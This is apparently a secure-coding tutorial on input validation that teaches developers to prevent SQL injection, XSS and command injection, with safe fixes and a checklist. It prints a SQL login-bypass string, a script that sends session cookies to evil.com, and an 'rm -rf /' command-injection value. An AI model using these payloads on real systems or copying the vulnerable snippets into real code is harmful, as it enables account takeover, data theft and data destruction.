Input Validation: Never Trust What Users Type

Security First — Part 15 of 30

The Story That Should Keep You Up at Night

September 2025. A fintech company worth two billion dollars. A developer — probably using an AI coding tool, moving fast, shipping features — built a login page. The AI generated clean-looking code. It worked perfectly in testing. Users could log in and log out without a hitch.

There was just one problem: the login code skipped input validation entirely. An attacker found the endpoint, typed a carefully crafted string into the email field, and bypassed authentication completely. No password needed. Just a few characters in a text box, and the front door to the entire platform swung open.

According to The Hacker News' 2025 web security retrospective, this is not a fringe incident. AI-generated code skips input validation regularly — and 45% of all AI-generated code contains exploitable flaws from the OWASP Top 10 list. Vibe coders who ship without understanding this concept are one unlucky afternoon away from a headline.

Today we fix that.

What Is Input Validation, Really?

Every application accepts data from the outside world. Users type into forms. They paste URLs. They upload files. They send API requests. Every single one of those inputs is, by default, untrusted — because you have no idea what's in it.

Input validation is the practice of checking that data is what you expect before you do anything with it.

That's it. That's the whole concept. But the failure to do it consistently is responsible for some of the most catastrophic breaches in software history.

Think of it like a nightclub bouncer. You don't just wave everyone through the door because they showed up. You check IDs. You verify they meet the requirements. You turn away anyone who doesn't belong. Your database — and your users — are the people inside the club. Input validation is the bouncer.

The Three Attacks You Need to Understand

1. SQL Injection: Talking Directly to Your Database

SQL injection is 27 years old. It was discovered in 1998. It is still — in 2025 and 2026 — actively emptying databases and bringing down production systems.

Here's why it keeps working: most applications use a database, and most databases speak SQL. When your app accepts user input and builds a database query with it, you're essentially letting the user write part of your SQL.

Let's say you have a login form. Your backend code (maybe AI-generated, maybe not) looks like this:

# DANGEROUS — never do this
query = "SELECT * FROM users WHERE email = '" + email_input + "' AND password = '" + password_input + "'"
cursor.execute(query)

A normal user types alice@example.com and their password. Fine. But an attacker types this into the email field:

' OR '1'='1' --

Your query becomes:

SELECT * FROM users WHERE email = '' OR '1'='1' --' AND password = ''

The -- comments out the rest of the line. The condition '1'='1' is always true. Your application logs the attacker in as the first user in the database — often an admin.

No password. No hack. Just a text box and 15 characters.

According to OWASP's 2025 Top 10, injection remains the #5 most critical vulnerability in web applications, affecting 100% of applications tested in some form. In May 2025, a government portal was breached via SQL injection, exposing sensitive citizen data. A China-linked threat actor was documented by Trend Micro in May 2025 as systematically targeting SQL injection vulnerabilities in internet-exposed SQL Servers across Brazil, India, and Southeast Asia — deploying ransomware after gaining access.

The fix: Use parameterized queries (also called prepared statements). Always. No exceptions.

# SAFE — always do this
query = "SELECT * FROM users WHERE email = %s AND password = %s"
cursor.execute(query, (email_input, password_input))

With parameterized queries, the database treats user input as data, never as instructions. The attacker's ' OR '1'='1' -- just gets looked up literally in the email column. It finds nothing. Attack foiled.

In JavaScript with a library like pg (PostgreSQL):

// SAFE
const result = await pool.query(
  'SELECT * FROM users WHERE email = $1 AND password = $2',
  [emailInput, passwordInput]
);

2. Cross-Site Scripting (XSS): Injecting Code Into Your Own Pages

XSS is what happens when your app takes user input and displays it back on a page without sanitizing it first. The attacker doesn't attack the server — they attack other users of your app by making your site serve their malicious code.

Imagine a comment form on your blog. A user submits:

<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>

If you store that and display it on the page without escaping it, every visitor who loads that page sends their session cookie to the attacker. The attacker logs in as them. Account takeover, at scale.

Microsoft's security research in November 2025 documented how XSS gets chained with other vulnerabilities to escalate into full account takeover and even remote code execution. One technique they outlined: an attacker embeds an XSS payload in a JSON field; a logging service writes it to an admin-facing HTML viewer; the admin's browser executes the payload and exfiltrates their authentication token. The attacker then takes over the admin account.

In 2025, over 150,000 websites were compromised in a single gambling-related JavaScript injection campaign. Fifty thousand banking sessions were hijacked using malware that used real-time page structure detection to inject scripts.

The fix: Escape output. When you display anything that came from a user, encode it so HTML characters become harmless text.

In Python with Jinja2 (Flask's default templating engine — autoescaping is on by default):

# Jinja2 auto-escapes in HTML templates — this is safe
# {{ user_comment }} renders as escaped text, not HTML
return render_template('post.html', user_comment=user_input)

In JavaScript/React (JSX automatically escapes values):

// SAFE — React escapes this automatically
function Comment({ text }) {
  return <p>{text}</p>;
}

// DANGEROUS — this disables React's escaping
function Comment({ text }) {
  return <p dangerouslySetInnerHTML={{ __html: text }} />;
}

See that dangerouslySetInnerHTML? React named it that on purpose. If you're using it with user-supplied content and you're not sanitizing, you have an XSS vulnerability.

3. Command Injection: Handing a Shell to Strangers

Some apps pass user input to the operating system shell. Image converters, file processors, CLI wrappers. If you're not careful, you hand the user a command prompt on your server.

# DANGEROUS — never pass user input to shell=True
import subprocess
filename = request.args.get('file')
subprocess.run(f"convert {filename} output.jpg", shell=True)

An attacker requests: ; rm -rf / #

Your server runs: convert ; rm -rf / # output.jpg

The fix: Pass arguments as a list, never as a shell string:

# SAFE
subprocess.run(["convert", filename, "output.jpg"])

The Vibe Coding Problem

Here's the uncomfortable truth: AI coding tools are making this worse before they make it better.

A March 2026 Forbes analysis found that security vulnerabilities are up to 2.74 times more common in AI-generated code. The Kaspersky security blog documented a specific pattern: AI models are optimized to produce code that works — that passes tests, that compiles, that satisfies the prompt. Security is not part of the optimization function.

The Enrichlead startup case is instructive. The founder proudly announced that 100% of the platform's code was written by Cursor AI. Days after launch, researchers found anyone could access paid features or alter other users' data. The app shut down. The problem? Lack of input validation, missing sanitization, and authentication logic implemented entirely on the client side — all classic AI code generation failure modes.

When you ask an AI to "make a login form," it will make you a login form. It probably won't add input validation unless you explicitly ask. And if you iterate on that code 40 times via follow-up prompts — adding features, fixing bugs — a GPT-4o study found the code accumulates 37% more critical vulnerabilities than the initial version after just five iterations.

You are the security layer the AI doesn't provide.

A Practical Input Validation Checklist

Use this every time you build a form, an API endpoint, or any code that accepts user input:

Validate Type and Format

import re
from datetime import datetime

def validate_email(email: str) -> bool:
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    return bool(re.match(pattern, email)) and len(email) <= 254

def validate_age(age_str: str) -> int:
    age = int(age_str)  # Will raise ValueError if not a number
    if not (0 <= age <= 150):
        raise ValueError("Age out of range")
    return age

Validate on the Server, Not Just the Browser

Client-side validation (JavaScript in the browser) is a UX nicety. It is not security. Anyone can open DevTools, disable your JavaScript, and send raw HTTP requests directly to your server. Always validate on the server.

// In Express.js — server-side validation
const { body, validationResult } = require('express-validator');

app.post('/register', [
  body('email').isEmail().normalizeEmail(),
  body('username').isAlphanumeric().isLength({ min: 3, max: 20 }),
  body('age').isInt({ min: 13, max: 120 })
], (req, res) => {
  const errors = validationResult(req);
  if (!errors.isEmpty()) {
    return res.status(400).json({ errors: errors.array() });
  }
  // Safe to proceed
});

Use an Allowlist, Not a Blocklist

Don't try to block "bad" characters — there are too many ways to encode them. Instead, define exactly what you will accept.

# BAD — trying to block bad input
def clean_username_bad(username):
    return username.replace("'", "").replace(";", "").replace("--", "")
    # Attackers know dozens of ways around this

# GOOD — only allow what you expect
def clean_username_good(username):
    import re
    if not re.match(r'^[a-zA-Z0-9_]{3,20}$', username):
        raise ValueError("Username must be 3-20 alphanumeric characters")
    return username

Parameterize Every Database Query

This deserves its own line item because it's that important:

# SQLAlchemy ORM (Python) — safe by default
user = db.session.query(User).filter_by(email=email_input).first()

# Raw SQL if you must — parameterize it
cursor.execute("SELECT * FROM users WHERE email = ?", (email_input,))

// Prisma ORM (TypeScript) — safe by default
const user = await prisma.user.findUnique({
  where: { email: emailInput }
});

// Raw query if needed
const user = await prisma.$queryRaw`SELECT * FROM users WHERE email = ${emailInput}`;

Encode Output

When writing user-supplied data back to HTML, encode it:

// Using DOMPurify for user-generated HTML content (like a rich text editor)
import DOMPurify from 'dompurify';

const safeHTML = DOMPurify.sanitize(userInput);
document.getElementById('output').innerHTML = safeHTML;

Quick Prompt Additions for AI-Generated Code

When you use Cursor, Claude, Copilot, or any AI tool to generate code that handles user input, add these to your prompt:

Generate [your feature]. Requirements:
- Validate all user inputs server-side before processing
- Use parameterized queries for all database operations
- Escape/encode all user-supplied data before rendering in HTML
- Do NOT use string concatenation to build SQL queries
- Do NOT use shell=True with user-supplied input

Adding this one paragraph to your prompts will catch the majority of AI-generated input validation failures.

Your Security Checklist for This Week

Audit your forms. List every input field in your app. Confirm each one has server-side validation.
Check your database queries. Search your code for string concatenation with variables going into SQL (+ or f-strings in query strings). Replace with parameterized queries.
Search for dangerouslySetInnerHTML, innerHTML =, document.write, or eval. Any of these with user data = XSS risk.
Search for shell=True. Any subprocess calls with shell=True and user input are command injection risks.
Add security requirements to your AI prompts. Copy-paste the prompt additions above into your default system prompt or project instructions.
Test your own inputs. In a search box or form field, try typing ', ", <script>alert(1)</script>, and ' OR '1'='1. Your app should handle these gracefully — not crash, not expose data, not execute them.

Ask The Guild

This week's community prompt: Have you found an input validation issue in AI-generated code — in your own project or someone else's? What did the AI get wrong, and how did you fix it? Drop your story in the #security-first channel. The most educational example gets featured in the Week 3 recap.

Tom Hundley has been building and breaking software systems for 25 years. He teaches security fundamentals to the next generation of AI-assisted developers at the AI Coding Guild.

Sources: